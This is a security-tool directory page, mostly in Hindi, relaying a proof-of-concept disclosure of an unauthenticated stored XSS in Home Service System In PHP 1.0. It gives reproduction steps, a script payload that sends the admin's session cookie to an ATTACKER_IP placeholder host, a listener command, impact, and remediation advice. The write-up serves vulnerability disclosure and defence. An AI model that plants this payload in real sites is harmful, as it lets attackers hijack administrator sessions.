Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-7089-XSS — # CVE-2026-7089 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, होम सर्विस सिस्टम PHP 1.0 में संग्रहीत XSS जो बुकिंग फॉर्म के माध्यम से बिना प्रमाणीकरण के एडमिन सत्र अपहरण की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/xmyronn/cve-2026-7089-xss
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubxmyronn/cve-2026-7089-xss

CVE-2026-7089-XSS

# CVE-2026-7089 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, होम सर्विस सिस्टम PHP 1.0 में संग्रहीत XSS जो बुकिंग फॉर्म के माध्यम से बिना प्रमाणीकरण के एडमिन सत्र अपहरण की अनुमति देता है।

रिपॉजिटरी देखें
116 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

home-service-system-unauth-stored-xss-admin-takeover

भेद्यता विवरण

फ़ील्डविवरण
विक्रेताcode-projects.org
उत्पादHome Service System In PHP
संस्करण1.0
भेद्यता प्रकारसंग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS)
CWECWE-79
प्रमाणीकरण आवश्यकनहीं
लेखकImad Alvi

विवरण

Home Service System In PHP 1.0 की booking.php फ़ाइल में एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता मौजूद है। अप्रमाणित उपयोगकर्ता बुकिंग फ़ॉर्म फ़ील्ड के माध्यम से दुर्भावनापूर्ण JavaScript पेलोड इंजेक्ट कर सकते हैं। अस्वच्छित इनपुट डेटाबेस में संग्रहीत किया जाता है और प्रशासन पैनल (admin.php) में आउटपुट एन्कोडिंग के बिना प्रस्तुत किया जाता है, जहाँ यह व्यवस्थापक के ब्राउज़र संदर्भ में निष्पादित होता है।

यह एक अप्रमाणित हमलावर को व्यवस्थापक सत्र कुकी चुराने, व्यवस्थापक की ओर से कार्य करने, या व्यवस्थापक खाते से पूरी तरह समझौता करने की अनुमति देता है।


प्रभावित घटक

  • फ़ाइल: booking.php
  • पैरामीटर: fname, lname
  • सिंक: admin.php → बुकिंग प्रबंधित करें

पुनरुत्पादन के चरण

  1. अप्रमाणित उपयोगकर्ता के रूप में बुकिंग पृष्ठ पर नेविगेट करें: http://TARGET/homeservices/booking.php?provider=

    Screenshot 2026-04-08 221145
  2. पहला नाम फ़ील्ड में, निम्नलिखित पेलोड इंजेक्ट करें:

<script>new Image().src="http://ATTACKER_IP:PORT?c="+document.cookie</script>
  1. शेष फ़ील्ड को किसी भी मान्य डेटा से भरें और बुकिंग सबमिट करें।

  2. अपने हमलावर मशीन पर एक लिसनर प्रारंभ करें:

php -S 0.0.0.0:PORT
  1. व्यवस्थापक के admin.php में बुकिंग प्रबंधित करें अनुभाग पर जाने की प्रतीक्षा करें।

  2. पेलोड व्यवस्थापक के ब्राउज़र में निष्पादित होता है, सत्र कुकी को आपके लिसनर पर बाहर निकालता है।

    Screenshot 2026-04-08 221158
Screenshot 2026-04-08 221214

प्रमाण की अवधारणा

पेलोड (अलर्ट)

<script>alert(1)</script>
Screenshot 2026-04-08 220538

पेलोड (सत्र अपहरण)

<script>new Image().src="http://ATTACKER_IP:7979?c="+document.cookie</script>

प्रभाव

यह भेद्यता एक दूरस्थ अप्रमाणित हमलावर को एप्लिकेशन से पूरी तरह समझौता करने की अनुमति देती है।

एक हमलावर यह कर सकता है:

  • व्यवस्थापक के ब्राउज़र में मनमाना JavaScript निष्पादित करें
  • व्यवस्थापक की PHPSESSID सत्र कुकी चुराएं
  • व्यवस्थापक सत्र का अपहरण करें और पूर्ण प्रशासनिक पहुँच प्राप्त करें
  • कोई भी प्रशासनिक कार्य करें (बुकिंग, प्रदाता आदि प्रबंधित करें)

इसके परिणामस्वरूप एप्लिकेशन से पूर्ण समझौता होता है।

उपचार

  • संग्रहीत या प्रस्तुत करने से पहले सभी उपयोगकर्ता-आपूर्ति इनपुट पर ENT_QUOTES के साथ htmlspecialchars() लागू करें
  • सामग्री सुरक्षा नीति (CSP) हेडर लागू करें
  • सभी फ़ॉर्म इनपुट को सर्वर-साइड पर मान्य और स्वच्छ करें

संदर्भ

  • Home Service System In PHP - code-projects.org
टूल डाउनलोड करें